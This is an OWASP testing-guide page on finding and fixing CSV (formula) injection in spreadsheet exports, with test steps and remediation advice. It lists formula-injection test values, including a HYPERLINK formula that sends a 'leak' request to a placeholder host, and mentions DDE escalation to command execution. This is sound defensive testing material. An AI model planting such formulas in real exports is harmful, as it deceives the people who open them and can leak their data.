WSTG - Latest

Testing for CSV Injection

ID
WSTG-INPV-21

Summary

CSV Injection (also known as Formula Injection) occurs when an application embeds untrusted, user-controlled input into CSV (or other spreadsheet-compatible) exports and the resulting file is opened in a spreadsheet program (e.g., Microsoft Excel, LibreOffice Calc). Spreadsheet applications may interpret certain cell values as formulas, which can lead to security issues such as user deception (phishing-style workflows), manipulation of spreadsheet output, or data exfiltration. In some environments, formula injection can be escalated to higher impact via spreadsheet “gadgets” and legacy features (e.g., DDE / Dynamic Data Exchange behaviors), potentially reaching command execution on the workstation that opens the file—typically dependent on client configuration and/or user interaction.

A key characteristic of this issue is that the vulnerability often manifests only when the exported file is opened by a user (e.g., an administrator, finance, or support) in a spreadsheet application.

Test Objectives

Identify CSV/spreadsheet export features that include untrusted input.
Verify whether attacker-controlled values are interpreted as formulas when the export is opened in common spreadsheet applications.
Check whether separator/quote injection can move a dangerous prefix to the start of a cell.
Validate whether mitigations remain effective in Microsoft Excel after saving and re-opening the CSV.
Assess practical impact based on who opens the export and how it is used.

How to Test

Formula-Triggering Prefixes

Cells beginning with the following characters may be interpreted as formulas by spreadsheet software:

Equals (=)
Plus (+)
Minus (-)
At (@)
Tab (0x09)
Carriage return (0x0D)
Line feed (0x0A)
Full-width (double-byte) variants such as ＝, ＋, －, ＠ (depending on locale/application behavior)

Important (Excel behavior): Microsoft Excel may remove quotes or escape characters from CSV cells when a file is saved and re-opened. As a result, some commonly suggested mitigations can fail after save/reopen and previously escaped formulas may become active again.

Also note that it is not sufficient to ensure the overall untrusted input does not start with a dangerous character. Attackers may inject separators and quoting to start a new cell, placing the dangerous character at the beginning of a cell.

Identify CSV Export Functionality and Data Sources

Locate features that generate CSV/TSV or “export to spreadsheet” content:

Reports (users, transactions, audit logs, tickets)
Admin dashboards exporting lists
Email attachments generated by the application
Scheduled exports / integrations

Identify untrusted data sources that can end up in the export:

User profiles (name, email, company)
Free-text fields (comments, ticket subjects, notes)
Imported/integrated external data (webhooks, CRM sync, partner feeds)

Document which roles can trigger the export and which roles are likely to open it.

Place Benign, Detectable Formula-Like Values into Candidate Fields

Use harmless payloads to detect formula evaluation (avoid payloads that execute commands or perform uncontrolled network access). Test values that begin with each formula-triggering character:

=1+1
+1+1
-1+1
@SUM(1,1)
=HYPERLINK("http://example.invalid/leak?test=1", "Click Me")

Notes:

The HYPERLINK() case is useful to demonstrate realistic impact (deception/phishing-style flows, or potential metadata exposure when a link is clicked/opened). Use a controlled endpoint during testing (e.g., a local listener or an internal test host).
Do not use external “real attacker” infrastructure in validation.

Also test control-character and Unicode variants (where input handling allows it):

A value that begins with a tab character followed by =1+1 (TAB + =1+1)
Full-width prefix variants (e.g., ＝1+1)

Test Separator and Quote “Cell Breakout” Scenarios

Because CSV is cell-based, test whether you can inject content that starts a new cell and then begins with a dangerous character. This depends on:

Field separator (commonly , or ;)
Quoting rules and escaping
Application-side CSV generation and encoding

Example benign test patterns (adjust separator to the actual export format):

A value containing a quote and separator intended to create a new cell, then =1+1
A value containing a separator directly (if not quoted by the exporter), then =1+1

Your objective is to see whether the resulting CSV contains any cell whose first character is one of the formula-triggering prefixes. Verify this by inspecting the raw CSV output in a text editor.

Export and Verify in Spreadsheet Applications

Export/download the CSV.
Open it in at least one spreadsheet application used in the target environment (Excel and/or LibreOffice, etc.).
Confirm whether the cell is interpreted as a formula:
- The spreadsheet displays the computed result (e.g., 2) instead of the literal string (e.g., =1+1), and/or
- The formula bar shows a formula rather than plain text.

Record:

Application name/version (e.g., Microsoft Excel)
How the file was opened (double-click vs import wizard)
Whether locale settings influenced parsing

Excel Save/Re-open Regression Test (Mitigation Reliability)

If the application claims to escape/quote values:

Open the exported CSV in Microsoft Excel.
Save the file (e.g., as CSV).
Close and re-open it.
Re-check whether previously “neutralized” values became active formulas.

This step is critical because Excel may normalize/remove certain escaping/quoting behaviors after save/reopen.

Assess Impact

Assess practical risk based on:

Who opens the file (privileged roles vs end users)
Whether exports are shared externally
Whether spreadsheet values are relied on for decisions (e.g., totals, flags, statuses)
Whether formulas could mislead users or trigger spreadsheet behaviors in your environment

Provide a clear reproduction path:

Where input is entered
How export is generated
Which program interprets it as a formula
Evidence (screenshot or description) that evaluation occurs

Higher-Impact Validation (Optional, Strictly Controlled)

Some real-world cases show formula injection escalating beyond simple calculation/deception (e.g., via legacy spreadsheet features such as DDE). This behavior is highly environment-dependent.

Remediation

There is no universal CSV sanitization strategy safe for all spreadsheet applications and downstream consumers. For CSVs intended for human viewing in spreadsheet software, apply a defense-in-depth approach:

Ensure no cell begins with formula-triggering characters (=, +, -, @) and relevant control/Unicode variants.
Consider per-field sanitization (commonly suggested):
- Wrap each cell in double quotes
- Prepend each cell with a single quote
- Escape double quotes by doubling them
  Note: This may not remain reliable in Microsoft Excel after saving and re-opening.
Excel-resistant mitigation (observed behavior):
- If a cell starts with =, +, -, or @, prefix the content with a tab character (0x09) inside a quoted field (e.g., "\t=1+1").
  Trade-off: The tab becomes part of the underlying data and may affect downstream programmatic imports.

Always validate the chosen mitigation against the spreadsheet applications and workflows in scope.

Tools

Intercepting proxy (e.g., Burp Suite, ZAP) to inject controlled values and reproduce the exact export workflow.
Spreadsheet software for validation in an isolated environment (e.g., Microsoft Excel, LibreOffice Calc).
A safe HTTP listener (local or internal test host) to observe clicks/requests when validating HYPERLINK() behavior.
A text editor to inspect the raw CSV and confirm whether any cell begins with a formula-triggering prefix.

References

Watch Star